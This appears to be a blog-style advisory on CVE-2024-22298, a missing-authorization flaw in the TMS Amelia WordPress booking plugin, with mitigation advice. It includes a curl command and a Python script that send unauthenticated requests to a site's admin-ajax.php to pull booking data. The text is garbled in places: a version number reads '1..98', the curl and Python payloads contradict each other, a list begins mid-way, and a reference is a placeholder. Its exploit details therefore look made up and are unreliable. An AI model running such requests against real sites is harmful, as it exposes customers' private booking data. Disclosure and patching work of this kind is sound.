In June 2024, CVE-2024-22298 was assigned to a critical security flaw found in the widely-used TMS Amelia WordPress plugin (also known as ameliabooking). This vulnerability is present in all versions of Amelia, up to and including 1..98. If left unpatched, it exposes your website and its booking data to unauthorized access—potentially letting attackers perform actions they shouldn’t. In this post, we’ll explain what the vulnerability is, provide exploit details, show proof-of-concept code, and link original references for your further reading.
🔥 What is TMS Amelia and Why is This Important?
TMS Amelia is a popular WordPress plugin for appointment and event booking. Businesses (from salons to gyms) rely on it to manage reservations, registrations, and customer data. Because it directly handles customer details and bookings, vulnerabilities can lead to serious privacy breaches or even site takeovers.
📢 The Vulnerability: Missing Authorization Check
CVE-2024-22298 is a *Missing Authorization* vulnerability. In simple terms: the plugin fails to properly check whether a user is logged in, or if they have permission to perform certain actions. This means an attacker could send crafted requests to the website and access or modify information without logging in or having the right role.
Let’s break it down
1. Normal Behavior: Actions (like managing appointments or viewing customer info) should be protected—only admins or registered users can do them.
2. Vulnerable Endpoint: The plugin exposes an endpoint (like /wp-admin/admin-ajax.php with the action=amelia_api POST parameter) that doesn’t verify if the request comes from a logged-in user.
3. Attacker’s Move: An attacker sends a direct HTTP request with crafted data, bypassing any login or access controls.
Example Exploit Code (Proof of Concept)
Here’s a simple curl command that could be used by an attacker to fetch sensitive info from an unpatched Amelia plugin installation:
curl -X POST https://victimsite.com/wp-admin/admin-ajax.php \
-d 'action=amelia_api' \
-d '{"apiCall":"GET","endpoint":"bookings"}' \
-H "Content-Type: application/json"
What’s happening above?
- The attacker sends a POST request to the admin-ajax.php endpoint, calling the vulnerable Amelia API.
No authentication cookies or tokens are needed!
- The request could return sensitive booking data or even allow adding/deleting entries.
For those who prefer Python
import requests
url = 'https://victimsite.com/wp-admin/admin-ajax.php'
data = {
'action': 'amelia_api',
'params': '{"apiCall":"GET","endpoint":"bookings"}'
}
headers = {'Content-Type': 'application/json'}
r = requests.post(url, json=data, headers=headers)
print(r.text)
Manipulation of bookings: Creating, editing, or deleting appointments without proper access.
- Website compromise: In some cases, attackers might exploit this as a stepping stone for further attacks.
🛡️ Mitigation Steps
1. Update Immediatey – Get the latest version of Amelia. Ensure you are running a version above 1..98 where the issue is patched.
2. Restrict API access: Use a firewall like Wordfence or Cloudflare to limit access to /wp-admin/admin-ajax.php.
3. Monitor for suspicious requests: Check your server logs for repeated use of the amelia_api action from unusual sources.
🔗 References
- Official CVE Record
- WPScan Entry *(if available)*
- Amelia Plugin Home
- WordPress Plugin Repository
📝 Final Words
CVE-2024-22298 shows that authorization checks are crucial, especially for plugins that manage sensitive data. If you’re using Amelia, update as soon as possible and educate your clients about the risks of using outdated plugins. Security is a moving target; stay vigilant!
*If you found this post helpful, share it with others in the WordPress community. Together, we can make the web safer!*
Timeline
Published on: 06/10/2024 08:15:48 UTC
Last modified on: 06/10/2024 12:40:41 UTC